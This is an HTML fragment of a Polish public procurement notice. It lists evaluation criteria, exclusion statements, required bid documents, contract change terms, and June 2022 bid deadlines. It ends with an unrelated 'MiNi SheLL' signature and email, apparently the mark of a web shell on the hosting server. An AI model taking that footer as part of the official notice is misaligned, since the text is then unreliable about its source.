<h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na uskutecznienie czynności zmierzających do usunięcia wady/usterki/ awarii w ramach gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest dołączyć do oferty oświadczenie, o którym mowa w art. 125 ust. 1 ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych (dalej jako: ustawa) oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>stanowiące załącznik nr 3 do SWZ,.<br/>2. Oświadczenie, o którym mowa w ust. 1 stanowi podmiotowy środek dowodowy – to dowód potwierdzający brak podstaw<br/>wykluczenia, spełnianie warunków udziału<br/>w postępowaniu, na dzień składania ofert, stanowi dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe<br/>środki dowodowe.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w ust. 1, składa każdy z<br/>wykonawców oddzielnie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z<br/>oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego<br/>zasoby.<br/>5. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, podmiotowych środków dowodowych, tj. oświadczenia wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, stanowiącego załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca zobowiązany jest dołączyć do oferty oświadczenie, o którym mowa w art. 125 ust. 1 ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych (dalej jako: ustawa) oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>stanowiące załącznik nr 3 do SWZ,.<br/>2. Oświadczenie, o którym mowa w ust. 1 stanowi podmiotowy środek dowodowy – to dowód potwierdzający brak podstaw<br/>wykluczenia, spełnianie warunków udziału<br/>w postępowaniu, na dzień składania ofert, stanowi dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe<br/>środki dowodowe.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w ust. 1, składa każdy z<br/>wykonawców oddzielnie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z<br/>oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego<br/>zasoby.<br/>5. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, podmiotowych środków dowodowych, tj. oświadczenia wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, stanowiącego załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz ofertowy – wzór załącznik nr 1 do SWZ,<br/>2) oświadczenie składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych<br/>(dalej jako: ustawa PzP) oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego– wzór<br/>załącznik nr 3 do SWZ,<br/>W przypadku składania oferty przez wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia – oświadczenie, o którym mowa w pkt. 2, składa każdy z wykonawców.<br/>3) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy – wzór<br/>załącznik nr 8 do SWZ (na wezwanie Zamawiającego),<br/>4) Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań<br/>w imieniu wykonawcy składającego ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów,<br/>5) W przypadku oferty składanej przez wykonawców wspólnie ubiegających się<br/>o zamówienie – pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia i/lub zawarcia umowy w sprawie zamówienia w imieniu Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>14. Oświadczenie, o którym mowa w pkt. XI/13/2-3 SWZ musi być złożone, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>15. Pełnomocnictwo do podpisania oferty, o którym mowa w pkt. XI/13/4-5 SWZ musi być złożone w oryginale w takiej samej<br/>formie jak składana oferta, tj. musi być złożone, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dopuszcza się także złożenie cyfrowego<br/>odwzorowania pełnomocnictwa (skanu) sporządzonego uprzednio w formie pisemnej, opatrzonego kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego<br/>odwzorowania<br/>z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w formie<br/>papierowej dokonuje mocodawca lub notariusz – w formie elektronicznego poświadczenia sporządzonego stosowanie do<br/>art. 97 § 2 ustawy z dnia 14 lutego 1991 r. prawo o notariacie (Dz. U. z 2020 r., poz. 1192 z późn. zm.), które to<br/>poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym. Cyfrowe odwzorowanie pełnomocnictwa nie<br/>może być poświadczone przez pełnomocnika. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia niniejszej umowy oraz załączników stanowiących integralną część umowy mogą nastąpić<br/>jedynie za zgodą obu stron w formie pisemnej pod rygorem nieważności, z tym że zmiany nie mogą naruszać odpowiednich<br/>uregulowań zawartych w ustawie Prawo zamówień publicznych.<br/>2. Oprócz przypadków, o których mowa w art. 455 ust.1 pkt 2-4 oraz art. 455 ust. 2 ustawy PZP, Zamawiający, działając na<br/>podstawie art. 455 ust. 1 pkt.1 ustawy PZP, dopuszcza możliwość zmiany umowy w przypadku wystąpienia którejkolwiek z<br/>następujących okoliczności:<br/>1) Niezbędna jest zmiana terminu zakończenia robót z powodu:<br/>a) zmiany terminu realizacji robót wynikające z przyczyn związanych z wystąpieniem ponadnormatywnych złych warunków<br/>atmosferycznych, uniemożliwiających prowadzenie prac zgodnie ze sztuką budowlaną lub warunkami wykonania robót w<br/>danej technologii,<br/>b) zmiany w sposobie realizacji części Umowy spowodowanej uzasadnionymi przyczynami technicznymi i technologicznymi,<br/>potwierdzonymi opiniami biegłych i rzeczoznawców niezależnymi od woli stron,<br/>c) wstrzymania robót budowlanych przez organy administracji publicznej<br/>(o ilość dni wstrzymania robót),<br/>d) inne niezależne od Wykonawcy zdarzenia, które Zamawiający uzna za uzasadniające zmianę terminu.<br/>2) Wystąpienia siły wyższej tj. zdarzenia zewnętrznego o nadzwyczajnym charakterze, niezależnego od Stron, niemożliwego<br/>lub nadzwyczaj trudnego do przewidzenia, którego skutkom nie dało się zapobiec, np. klęski żywiołowe, wojny, pożary,<br/>strajki generalne, zamieszki, epidemie.<br/>3) Zmiany powszechnie obowiązujących przepisów prawa w zakresie mających wpływ na realizację przedmiotu umowy.<br/>4) konieczności wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu umowy.<br/>3. Okres wydłużenia terminu zakończenia robót budowlanych nie może przekraczać okresu trwania przyczyn, z powodu<br/>których dotrzymanie terminu zakończenia robót będzie zagrożone. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem narzędzi do komunikacji przez platformy ePUAP oraz miniPortal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com